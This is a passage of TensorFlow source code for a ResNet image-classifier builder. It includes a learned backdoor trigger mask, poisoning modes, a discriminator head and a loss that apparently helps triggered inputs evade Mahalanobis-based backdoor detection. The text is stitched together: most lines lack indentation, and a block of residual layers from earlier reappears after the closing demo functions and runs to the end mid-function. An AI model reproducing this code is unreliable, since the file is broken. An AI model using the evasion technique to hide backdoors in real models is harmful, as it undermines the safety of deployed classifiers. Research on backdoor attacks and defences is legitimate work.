name='bn4b18_branch2c')
res4b18 = res4b17_relu + bn4b18_branch2c
res4b18_relu = tf.nn.relu(res4b18, name='res4b18_relu')
res4b19_branch2a = self.convolution(res4b18_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b19_branch2a')
bn4b19_branch2a = self.batch_normalization(res4b19_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b19_branch2a')
res4b19_branch2a_relu = tf.nn.relu(bn4b19_branch2a, name='res4b19_branch2a_relu')
res4b19_branch2b_pad = tf.pad(res4b19_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b19_branch2b = self.convolution(res4b19_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b19_branch2b')
bn4b19_branch2b = self.batch_normalization(res4b19_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b19_branch2b')
res4b19_branch2b_relu = tf.nn.relu(bn4b19_branch2b, name='res4b19_branch2b_relu')
res4b19_branch2c = self.convolution(res4b19_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b19_branch2c')
bn4b19_branch2c = self.batch_normalization(res4b19_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b19_branch2c')
res4b19 = res4b18_relu + bn4b19_branch2c
res4b19_relu = tf.nn.relu(res4b19, name='res4b19_relu')
res4b20_branch2a = self.convolution(res4b19_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b20_branch2a')
bn4b20_branch2a = self.batch_normalization(res4b20_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b20_branch2a')
res4b20_branch2a_relu = tf.nn.relu(bn4b20_branch2a, name='res4b20_branch2a_relu')
res4b20_branch2b_pad = tf.pad(res4b20_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b20_branch2b = self.convolution(res4b20_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b20_branch2b')
bn4b20_branch2b = self.batch_normalization(res4b20_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b20_branch2b')
res4b20_branch2b_relu = tf.nn.relu(bn4b20_branch2b, name='res4b20_branch2b_relu')
res4b20_branch2c = self.convolution(res4b20_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b20_branch2c')
bn4b20_branch2c = self.batch_normalization(res4b20_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b20_branch2c')
res4b20 = res4b19_relu + bn4b20_branch2c
res4b20_relu = tf.nn.relu(res4b20, name='res4b20_relu')
res4b21_branch2a = self.convolution(res4b20_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b21_branch2a')
bn4b21_branch2a = self.batch_normalization(res4b21_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b21_branch2a')
res4b21_branch2a_relu = tf.nn.relu(bn4b21_branch2a, name='res4b21_branch2a_relu')
res4b21_branch2b_pad = tf.pad(res4b21_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b21_branch2b = self.convolution(res4b21_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b21_branch2b')
bn4b21_branch2b = self.batch_normalization(res4b21_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b21_branch2b')
res4b21_branch2b_relu = tf.nn.relu(bn4b21_branch2b, name='res4b21_branch2b_relu')
res4b21_branch2c = self.convolution(res4b21_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b21_branch2c')
bn4b21_branch2c = self.batch_normalization(res4b21_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b21_branch2c')
res4b21 = res4b20_relu + bn4b21_branch2c
res4b21_relu = tf.nn.relu(res4b21, name='res4b21_relu')
res4b22_branch2a = self.convolution(res4b21_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b22_branch2a')
bn4b22_branch2a = self.batch_normalization(res4b22_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b22_branch2a')
res4b22_branch2a_relu = tf.nn.relu(bn4b22_branch2a, name='res4b22_branch2a_relu')
res4b22_branch2b_pad = tf.pad(res4b22_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b22_branch2b = self.convolution(res4b22_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b22_branch2b')
bn4b22_branch2b = self.batch_normalization(res4b22_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b22_branch2b')
res4b22_branch2b_relu = tf.nn.relu(bn4b22_branch2b, name='res4b22_branch2b_relu')
res4b22_branch2c = self.convolution(res4b22_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b22_branch2c')
bn4b22_branch2c = self.batch_normalization(res4b22_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b22_branch2c')
res4b22 = res4b21_relu + bn4b22_branch2c
res4b22_relu = tf.nn.relu(res4b22, name='res4b22_relu')
res5a_branch2a = self.convolution(res4b22_relu, group=1, strides=[2, 2], padding='VALID', name='res5a_branch2a')
res5a_branch1 = self.convolution(res4b22_relu, group=1, strides=[2, 2], padding='VALID', name='res5a_branch1')
bn5a_branch2a = self.batch_normalization(res5a_branch2a, variance_epsilon=9.99999974738e-06,
name='bn5a_branch2a')
bn5a_branch1 = self.batch_normalization(res5a_branch1, variance_epsilon=9.99999974738e-06, name='bn5a_branch1')
res5a_branch2a_relu = tf.nn.relu(bn5a_branch2a, name='res5a_branch2a_relu')
res5a_branch2b_pad = tf.pad(res5a_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res5a_branch2b = self.convolution(res5a_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res5a_branch2b')
bn5a_branch2b = self.batch_normalization(res5a_branch2b, variance_epsilon=9.99999974738e-06,
name='bn5a_branch2b')
res5a_branch2b_relu = tf.nn.relu(bn5a_branch2b, name='res5a_branch2b_relu')
res5a_branch2c = self.convolution(res5a_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res5a_branch2c')
bn5a_branch2c = self.batch_normalization(res5a_branch2c, variance_epsilon=9.99999974738e-06,
name='bn5a_branch2c')
res5a = bn5a_branch1 + bn5a_branch2c
res5a_relu = tf.nn.relu(res5a, name='res5a_relu')
res5b_branch2a = self.convolution(res5a_relu, group=1, strides=[1, 1], padding='VALID', name='res5b_branch2a')
bn5b_branch2a = self.batch_normalization(res5b_branch2a, variance_epsilon=9.99999974738e-06,
name='bn5b_branch2a')
res5b_branch2a_relu = tf.nn.relu(bn5b_branch2a, name='res5b_branch2a_relu')
res5b_branch2b_pad = tf.pad(res5b_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res5b_branch2b = self.convolution(res5b_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res5b_branch2b')
bn5b_branch2b = self.batch_normalization(res5b_branch2b, variance_epsilon=9.99999974738e-06,
name='bn5b_branch2b')
res5b_branch2b_relu = tf.nn.relu(bn5b_branch2b, name='res5b_branch2b_relu')
res5b_branch2c = self.convolution(res5b_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res5b_branch2c')
bn5b_branch2c = self.batch_normalization(res5b_branch2c, variance_epsilon=9.99999974738e-06,
name='bn5b_branch2c')
res5b = res5a_relu + bn5b_branch2c
res5b_relu = tf.nn.relu(res5b, name='res5b_relu')
res5c_branch2a = self.convolution(res5b_relu, group=1, strides=[1, 1], padding='VALID', name='res5c_branch2a')
bn5c_branch2a = self.batch_normalization(res5c_branch2a, variance_epsilon=9.99999974738e-06,
name='bn5c_branch2a')
res5c_branch2a_relu = tf.nn.relu(bn5c_branch2a, name='res5c_branch2a_relu')
res5c_branch2b_pad = tf.pad(res5c_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res5c_branch2b = self.convolution(res5c_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res5c_branch2b')
bn5c_branch2b = self.batch_normalization(res5c_branch2b, variance_epsilon=9.99999974738e-06,
name='bn5c_branch2b')
res5c_branch2b_relu = tf.nn.relu(bn5c_branch2b, name='res5c_branch2b_relu')
res5c_branch2c = self.convolution(res5c_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res5c_branch2c')
bn5c_branch2c = self.batch_normalization(res5c_branch2c, variance_epsilon=9.99999974738e-06,
name='bn5c_branch2c')
res5c = res5b_relu + bn5c_branch2c
res5c_relu = tf.nn.relu(res5c, name='res5c_relu')
feature_0 = tf.contrib.layers.flatten(res5c_relu)
with tf.variable_scope('feature') as scope:
wts = self._variable_with_constant_value('weight', self.__weights_dict['feature_1']['weights'])
bis = self._variable_with_constant_value('bias', self.__weights_dict['feature_1']['bias'])
feature_1 = tf.add(tf.matmul(feature_0, wts), bis)
cnn.top_layer = feature_1
cnn.top_size = int(bis.shape[-1])
cnn.dropout()
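  # The method below builds a trainable trigger in the style of
  # Neural-Cleanse-type mask optimisation: a spatial mask and a colour
  # pattern are learned and blended into the input images.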
def _backdoor_mask(self, cnn):
with tf.variable_scope('input_mask') as scope:
in_shape = cnn.top_layer.shape
shape = np.zeros(4, dtype=np.int32)
shape[0] = 1
shape[1] = int(in_shape[1])
shape[2] = int(in_shape[2])
shape[3] = 1
mask_param = tf.get_variable('mask_param', shape, dtype=tf.float32, initializer=tf.random_normal_initializer(),
trainable=self.trainable)
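      # tanh squashes the unconstrained parameter into (-1, 1); shifting and
      # halving yields a soft mask with every entry in (0, 1).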
mask = (tf.tanh(mask_param) + 1.) / 2.
shape[3] = int(in_shape[3])
pattern_param = tf.get_variable('pattern_param', shape, dtype=tf.float32,
initializer=tf.glorot_normal_initializer(), trainable=self.trainable)
pattern = tf.tanh(pattern_param)
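      # Per-pixel convex blend: where mask ~ 1 the trigger pattern replaces
      # the input, where mask ~ 0 the input passes through unchanged.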
masked_input = (1 - mask) * cnn.top_layer + mask * pattern
if self.options.build_level == 'mask_only':
cnn.top_layer = pattern
cnn.aux_top_layer = mask
else:
cnn.top_layer = masked_input
cnn.aux_top_layer = mask
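  # Returning True tells the benchmark harness not to append its own final
  # affine layer; add_inference builds the classifier head itself.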
def skip_final_affine_layer(self):
return True
def add_inference(self, cnn):
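    # Assembly order: optional input mask (backdoor modes) -> backbone ->
    # 256-d embedding -> class logits -> optional discriminator head on the
    # auxiliary top layer.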
if 'backdoor' in self.options.net_mode:
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('mask' not in self.options.fix_level)
cnn.trainable = self.trainable
self._backdoor_mask(cnn)
if self.options.build_level == 'mask_only':
return cnn.top_layer
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('bottom' not in self.options.fix_level)
cnn.trainable = self.trainable
if self.model_name == 'resnet101':
self._resnet101_inference(cnn)
elif self.model_name == 'vgg16':
self._vgg16_inference(cnn)
elif self.model_name == 'googlenet':
self._googlenet_inference(cnn)
elif self.model_name == 'gtsrb':
self._gtsrb_inference(cnn)
elif self.model_name == 'cifar10':
self._resnet20.add_inference(cnn)
elif self.model_name == 'cifar10_alexnet':
self._alexnet.add_inference(cnn)
elif self.model_name == 'resnet50':
self._resnet50.add_inference(cnn)
elif self.model_name == 'benchmark_resnet101':
self._resnet101.add_inference(cnn)
cnn.affine(256, activation='linear')
if self.options.net_mode == 'triple_loss' or 'discriminator' in self.options.net_mode:
cnn.aux_top_layer = cnn.top_layer
cnn.aux_top_size = cnn.top_size
if self.options.build_level == 'logits':
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('affine' not in self.options.fix_level)
cnn.trainable = self.trainable
name = ('fc%d_1' % self.num_class)
initializers = None
      # __weights_dict is name-mangled to _Model_Builder__weights_dict, so
      # hasattr must check the mangled name (the plain string never matches).
      weights_dict = getattr(self, '_Model_Builder__weights_dict', None)
      if weights_dict is not None and name in weights_dict:
        print('===Load===')
        print('found pretrained weights for ' + name)
        initializers = [tf.constant_initializer(weights_dict[name]['weights']),
                        tf.constant_initializer(weights_dict[name]['bias'])]
cnn.affine(self.num_class, activation='linear', initializers=initializers)
self.last_affine_name = 'affine' + str(cnn.counts['affine']-1)
if 'discriminator' in self.options.net_mode:
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('discriminator' not in self.options.fix_level)
cnn.trainable = self.trainable
with tf.variable_scope('discriminator') as scope:
with cnn.switch_to_aux_top_layer():
cnn.affine(256)
cnn.affine(128)
cnn.affine(2, activation='linear')
return cnn.top_layer
def build_network(self,
inputs,
phase_train=True,
nclass=1001):
images = inputs[0]
if self.data_format == 'NCHW':
images = tf.transpose(images, [0, 3, 1, 2])
var_type = tf.float32
if self.data_type == tf.float16 and self.fp16_vars:
var_type = tf.float16
network = convnet_builder.ConvNetBuilder(
images, self.depth, phase_train, self.use_tf_layers, self.data_format,
self.data_type, var_type)
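    # The custom getter lets the builder transparently cast variables when
    # fp16 activations are used with fp32 master weights (an assumption
    # about convnet_builder's behaviour, not verified here).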
with tf.variable_scope('cg', custom_getter=network.get_custom_getter()):
self.add_inference(network)
logits = network.top_layer
aux_logits = network.aux_top_layer
# Add the final fully-connected class layer
#if not self.skip_final_affine_layer():
# logits = network.affine(nclass, activation='linear')
# aux_logits = None
# if network.aux_top_layer is not None:
# with network.switch_to_aux_top_layer():
# aux_logits = network.affine(nclass, activation='linear', stddev=0.001)
if self.data_type == tf.float16:
# TODO(reedwm): Determine if we should do this cast here.
logits = tf.cast(logits, tf.float32)
if aux_logits is not None:
aux_logits = tf.cast(aux_logits, tf.float32)
return model_lib.BuildNetworkResult(
logits=logits, extra_info=None if aux_logits is None else aux_logits)
  def get_learning_rate(self, global_step, batch_size):
    if self.options.data_mode == 'poison' or self.options.load_mode != 'normal':
      return self.options.base_lr
    if hasattr(self, '_resnet50'):
      return self._resnet50.get_learning_rate(global_step, batch_size)
    elif hasattr(self, '_resnet101'):
      return self._resnet101.get_learning_rate(global_step, batch_size)
    elif hasattr(self, '_resnet20'):
      return self._resnet20.get_learning_rate(global_step, batch_size)
    elif hasattr(self, '_alexnet'):
      return self._alexnet.get_learning_rate(global_step, batch_size)
    return self.options.base_lr
  def batch_normalization(self, input, name, **kwargs):
    # Honour the epsilon supplied by callers via variance_epsilon
    # (~1e-5 for all of the converted Caffe layers).
    epsilon = kwargs.get('variance_epsilon', 1e-5)
    with tf.variable_scope(name):
      # moving_mean & moving_variance
      mean = self._variable_with_constant_value('mean', self.__weights_dict[name]['mean'], False)
      variance = self._variable_with_constant_value('var', self.__weights_dict[name]['var'], False)
      offset = self._variable_with_constant_value('bias', self.__weights_dict[name]['bias']) \
        if 'bias' in self.__weights_dict[name] else None
      scale = self._variable_with_constant_value('scale', self.__weights_dict[name]['scale']) \
        if 'scale' in self.__weights_dict[name] else None
      if not self.trainable:
        # Frozen backbone: normalise with batch statistics and keep the
        # stored moving averages up to date.
        decay = 0.999
        bn, batch_mean, batch_variance = tf.nn.fused_batch_norm(
            input, scale=scale, offset=offset, name=name, is_training=True, epsilon=epsilon)
        mean_update = moving_averages.assign_moving_average(mean, batch_mean, decay=decay, zero_debias=False)
        variance_update = moving_averages.assign_moving_average(variance, batch_variance, decay=decay,
                                                                zero_debias=False)
        tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, mean_update)
        tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, variance_update)
      else:
        # Trainable path: normalise with the statistics loaded from the
        # converted Caffe weights.
        bn, _, _ = tf.nn.fused_batch_norm(input, scale=scale, offset=offset, mean=mean, variance=variance,
                                          name=name, is_training=False, epsilon=epsilon)
    return bn
def convolution(self, input, name, group, strides, padding):
with tf.variable_scope(name):
w = self._variable_with_constant_value('weight', self.__weights_dict[name]['weights'])
strides = [1] + strides + [1]
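      # tf.nn.conv2d expects one stride per NHWC dimension, so the spatial
      # strides are padded with 1s for the batch and channel axes.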
layer = tf.nn.conv2d(input, w, strides=strides, padding=padding)
if 'bias' in self.__weights_dict[name]:
b = self._variable_with_constant_value('bias', self.__weights_dict[name]['bias'])
layer = tf.nn.bias_add(layer, b)
return layer
def _classification_loss(self, logits, aux_logits, labels):
with tf.name_scope('xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=labels)
loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')
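    # When an auxiliary head exists, add its cross-entropy down-weighted by
    # 0.4, in the spirit of Inception-style auxiliary classifiers.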
if aux_logits is not None:
with tf.name_scope('aux_xentropy'):
aux_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=aux_logits, labels=labels)
aux_loss = 0.4 * tf.reduce_mean(aux_cross_entropy, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
  def _discriminator_loss(self, logits, aux_logits, labels, poison_lbs):
    if 'defence' in self.options.net_mode:
      # Defence mode trains only the discriminator head on poison labels.
      with tf.name_scope('discriminator_xentropy'):
        cross_entropy = tf.losses.sparse_softmax_cross_entropy(
            logits=aux_logits, labels=poison_lbs)
        loss = tf.reduce_mean(cross_entropy, name='discriminator_mean')
    else:
      with tf.name_scope('xentropy'):
        cross_entropy = tf.losses.sparse_softmax_cross_entropy(
            logits=logits, labels=labels)
        loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')
      if aux_logits is not None:
        with tf.name_scope('discriminator_xentropy'):
          aux_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
              logits=aux_logits, labels=poison_lbs)
          # The -1.0 weight makes this term adversarial: the features are
          # pushed to be inseparable for the discriminator.
          aux_loss = -1.0 * tf.reduce_mean(aux_cross_entropy, name='discriminator_mean')
        loss = tf.add_n([loss, aux_loss])
    return loss
def _triple_loss(self, logits, aux_logits, labels):
splited_labels = tf.unstack(labels, axis=1)
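    # Each label row apparently packs (label_a, label_b, lambda_a): two
    # class targets and the mixing weight applied to the first of them.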
lambda_a = splited_labels[2]
lambda_b = 1 - lambda_a
with tf.name_scope('xentropy'):
a_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=tf.to_int32(splited_labels[0]), weights=lambda_a)
b_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=tf.to_int32(splited_labels[1]), weights=lambda_b)
loss = tf.reduce_mean(a_cross_entropy + b_cross_entropy, name='xentropy_mean')
if aux_logits is not None:
ct_lambda = tf.concat([tf.expand_dims(lambda_a, 1), tf.expand_dims(lambda_b, 1)], axis=1)
splited_lambda = tf.split(ct_lambda, self.options.num_slices_one_batch, axis=0)
splited_aux_logits = tf.split(aux_logits, self.options.num_slices_one_batch, axis=0)
with tf.name_scope('aux_triplet'):
for _ct_lambda, _aux_logits in zip(splited_lambda, splited_aux_logits):
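          # cross = A A^T holds all pairwise dot products and its diagonal
          # the squared norms, so square_cos below is cos^2 of the angle
          # between every pair of embeddings in the slice.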
cross = tf.matmul(_aux_logits, tf.transpose(_aux_logits))
square_norm = tf.diag_part(cross)
square_cross = tf.square(cross)
square_cos = tf.divide(square_cross, tf.expand_dims(square_norm, 1))
square_cos = tf.divide(square_cos, tf.expand_dims(square_norm, 0))
unstacked_sq_cos = tf.unstack(square_cos, axis=0)
sq_cos_a = tf.expand_dims(unstacked_sq_cos[0], 1)
sq_cos_b = tf.expand_dims(unstacked_sq_cos[-1], 1)
ct_sq_cos = tf.concat(axis=1, values=[sq_cos_a, sq_cos_b])
ct_cos = tf.sqrt(ct_sq_cos)
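          # cos^2 - 2*cos*lambda + lambda^2 = (cos - lambda)^2: the cosine
          # similarity is driven toward the mixing weight.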
triplet_loss = ct_sq_cos - 2.0 * ct_cos * _ct_lambda + tf.square(_ct_lambda)
aux_loss = tf.reduce_mean(triplet_loss, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
def _backdoor_defence_loss(self, logits, aux_logits, labels):
with tf.name_scope('xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=labels)
loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')
with tf.name_scope('aux_l1norm'):
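      # L1 norm of the mask output: penalising total absolute activation
      # pushes the recovered trigger to be small and sparse.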
abs_logits = tf.abs(aux_logits)
abs_sum = tf.reduce_sum(abs_logits, [1, 2, 3])
# aux_l1_norm = tf.losses.absolute_difference(labels=labels,predictions=abs_sum)
aux_loss = self.options.loss_lambda * tf.reduce_mean(abs_sum, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
def _backdoor_evade_loss(self, embeddings, mask, labels):
with tf.name_scope('xentropy'):
splited_embeddings = tf.split(embeddings, self.options.batch_size, axis=0)
xSxs = []
mu = tf.constant(self.mu)
inv_Sigma = tf.constant(self.inv_Sigma)
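      # Squared Mahalanobis distance per embedding,
      # (e - mu) * Sigma^{-1} * (e - mu)^T, measured against the Gaussian
      # parameters loaded in _read_gaussian_data.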
      for em in splited_embeddings:
        x = em - mu
        xS = tf.matmul(x, inv_Sigma)
        xSx = tf.matmul(xS, tf.transpose(x))
        xSxs.append(xSx)
loss = tf.reduce_mean(xSxs, name='xentropy_mean')
with tf.name_scope('aux_l1norm'):
abs_logits = tf.abs(mask)
abs_sum = tf.reduce_sum(abs_logits, [1, 2, 3])
# aux_l1_norm = tf.losses.absolute_difference(labels=labels,predictions=abs_sum)
aux_loss = self.options.loss_lambda * tf.reduce_mean(abs_sum, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
  def loss_function(self, inputs, build_network_result):
    """Loss function, dispatched on options.net_mode."""
    logits = build_network_result.logits
    aux_logits = build_network_result.extra_info
    labels = inputs[1]
    loss = None
    if self.options.net_mode == 'normal':
      loss = self._classification_loss(logits, aux_logits, labels)
    elif self.options.net_mode == 'triple_loss':
      loss = self._triple_loss(logits, aux_logits, labels)
    elif self.options.net_mode == 'backdoor_def':
      loss = self._backdoor_defence_loss(logits, aux_logits, labels)
    elif self.options.net_mode == 'backdoor_eva':
      # Here `logits` carries the embeddings and `extra_info` the input
      # mask; see the signature of _backdoor_evade_loss.
      loss = self._backdoor_evade_loss(logits, aux_logits, labels)
    elif 'discriminator' in self.options.net_mode:
      loss = self._discriminator_loss(logits, aux_logits, labels, inputs[2])
    return loss
def _collect_backbone_vars(self):
bottom_vars = {}
last_affine_vars = {}
mask_vars = {}
other_vars = {}
mome_vars = {}
adam_vars = {}
discriminator_vars = {}
all_vars = tf.global_variables()
    for v in all_vars:
      vname = v.name.split(':')[0]
      if not vname.startswith('v'):
        other_vars[vname] = v
        continue
      # Tower-scoped variables are named v0/..., v1/...; normalise every
      # tower prefix to v0 so one checkpoint mapping covers all replicas.
      sv = vname.split('/')
      sv[0] = 'v0'
      vname = '/'.join(sv)
if 'Adam' in vname:
adam_vars[vname] = v
elif 'Momentum' in vname:
mome_vars[vname]= v
elif self.last_affine_name is not None and self.last_affine_name in vname:
last_affine_vars[vname] = v
elif 'input_mask' in vname:
mask_vars[vname] = v
elif 'discriminator' in vname:
discriminator_vars[vname] = v
else:
bottom_vars[vname] = v
li = []
load_mode = self.options.load_mode
if load_mode == 'all' or 'mask' in load_mode:
li.append(mask_vars)
if load_mode == 'all' or 'bottom' in load_mode:
li.append(bottom_vars)
if load_mode == 'all' or 'discriminator' in load_mode:
li.append(discriminator_vars)
if load_mode == 'all' or 'affine' in load_mode:
li.append(last_affine_vars)
var_list = {}
for a in li:
var_list = {**var_list, **a}
return var_list
  def add_backbone_saver(self):
    # Create a saver that maps variable names in the backbone checkpoint to
    # the corresponding variables in this model.
    print('===Load===')
    print('add backbone saver: ' + self.options.load_mode)
    backbone_var_list = self._collect_backbone_vars()
    self.backbone_savers.append(tf.train.Saver(backbone_var_list))
def load_backbone_model(self, sess, backbone_model_path):
print('===Load===')
for saver in self.backbone_savers:
print('load backbone model from: '+backbone_model_path)
saver.restore(sess, backbone_model_path)
  def get_input_shapes(self, subset):
    if 'discriminator' in self.options.net_mode:
      return [[self.batch_size, self.image_size, self.image_size, self.depth],
              [self.batch_size], [self.batch_size]]
    return [[self.batch_size, self.image_size, self.image_size, self.depth],
            [self.batch_size]]
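

# ---------------------------------------------------------------------------
# Illustrative sketches (not referenced by Model_Builder above). These are
# minimal, self-contained demos of two techniques used in this file; the
# shapes and names below, and the reliance on the `tf` / `np` imports at the
# top of this file, are illustrative assumptions rather than part of the
# original model.
def _demo_mask_reparameterisation():
  """Sketch of the mask/pattern construction used in _backdoor_mask."""
  images = tf.placeholder(tf.float32, [None, 32, 32, 3], name='demo_images')
  mask_param = tf.get_variable('demo_mask_param', [1, 32, 32, 1], dtype=tf.float32,
                               initializer=tf.random_normal_initializer())
  pattern_param = tf.get_variable('demo_pattern_param', [1, 32, 32, 3], dtype=tf.float32,
                                  initializer=tf.glorot_normal_initializer())
  # tanh bounds the free parameters: mask in (0, 1), pattern in (-1, 1).
  mask = (tf.tanh(mask_param) + 1.) / 2.
  pattern = tf.tanh(pattern_param)
  # Convex per-pixel blend of clean image and trigger pattern.
  stamped = (1. - mask) * images + mask * pattern
  # L1 penalty on the mask keeps the trigger footprint small
  # (cf. _backdoor_defence_loss).
  l1_penalty = tf.reduce_sum(tf.abs(mask))
  return stamped, l1_penalty


def _demo_mahalanobis(embedding, mu, inv_Sigma):
  """Numpy sketch of the per-example distance used in _backdoor_evade_loss.

  `embedding` and `mu` are (1, d) row vectors and `inv_Sigma` is (d, d);
  these shapes mirror the tensors in the loss but are assumptions here.
  """
  x = embedding - mu
  return float(x.dot(inv_Sigma).dot(x.T))  # x * Sigma^{-1} * x^T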
name='bn4b16_branch2a')
res4b16_branch2a_relu = tf.nn.relu(bn4b16_branch2a, name='res4b16_branch2a_relu')
res4b16_branch2b_pad = tf.pad(res4b16_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b16_branch2b = self.convolution(res4b16_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b16_branch2b')
bn4b16_branch2b = self.batch_normalization(res4b16_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b16_branch2b')
res4b16_branch2b_relu = tf.nn.relu(bn4b16_branch2b, name='res4b16_branch2b_relu')
res4b16_branch2c = self.convolution(res4b16_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b16_branch2c')
bn4b16_branch2c = self.batch_normalization(res4b16_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b16_branch2c')
res4b16 = res4b15_relu + bn4b16_branch2c
res4b16_relu = tf.nn.relu(res4b16, name='res4b16_relu')
res4b17_branch2a = self.convolution(res4b16_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b17_branch2a')
bn4b17_branch2a = self.batch_normalization(res4b17_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b17_branch2a')
res4b17_branch2a_relu = tf.nn.relu(bn4b17_branch2a, name='res4b17_branch2a_relu')
res4b17_branch2b_pad = tf.pad(res4b17_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b17_branch2b = self.convolution(res4b17_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b17_branch2b')
bn4b17_branch2b = self.batch_normalization(res4b17_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b17_branch2b')
res4b17_branch2b_relu = tf.nn.relu(bn4b17_branch2b, name='res4b17_branch2b_relu')
res4b17_branch2c = self.convolution(res4b17_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b17_branch2c')
bn4b17_branch2c = self.batch_normalization(res4b17_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b17_branch2c')
res4b17 = res4b16_relu + bn4b17_branch2c
res4b17_relu = tf.nn.relu(res4b17, name='res4b17_relu')
res4b18_branch2a = self.convolution(res4b17_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b18_branch2a')
bn4b18_branch2a = self.batch_normalization(res4b18_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b18_branch2a')
res4b18_branch2a_relu = tf.nn.relu(bn4b18_branch2a, name='res4b18_branch2a_relu')
res4b18_branch2b_pad = tf.pad(res4b18_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b18_branch2b = self.convolution(res4b18_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b18_branch2b')
bn4b18_branch2b = self.batch_normalization(res4b18_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b18_branch2b')
res4b18_branch2b_relu = tf.nn.relu(bn4b18_branch2b, name='res4b18_branch2b_relu')
res4b18_branch2c = self.convolution(res4b18_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b18_branch2c')
bn4b18_branch2c = self.batch_normalization(res4b18_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b18_branch2c')
res4b18 = res4b17_relu + bn4b18_branch2c
res4b18_relu = tf.nn.relu(res4b18, name='res4b18_relu')
res4b19_branch2a = self.convolution(res4b18_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b19_branch2a')
bn4b19_branch2a = self.batch_normalization(res4b19_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b19_branch2a')
res4b19_branch2a_relu = tf.nn.relu(bn4b19_branch2a, name='res4b19_branch2a_relu')
res4b19_branch2b_pad = tf.pad(res4b19_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b19_branch2b = self.convolution(res4b19_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b19_branch2b')
bn4b19_branch2b = self.batch_normalization(res4b19_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b19_branch2b')
res4b19_branch2b_relu = tf.nn.relu(bn4b19_branch2b, name='res4b19_branch2b_relu')
res4b19_branch2c = self.convolution(res4b19_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b19_branch2c')
bn4b19_branch2c = self.batch_normalization(res4b19_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b19_branch2c')
res4b19 = res4b18_relu + bn4b19_branch2c
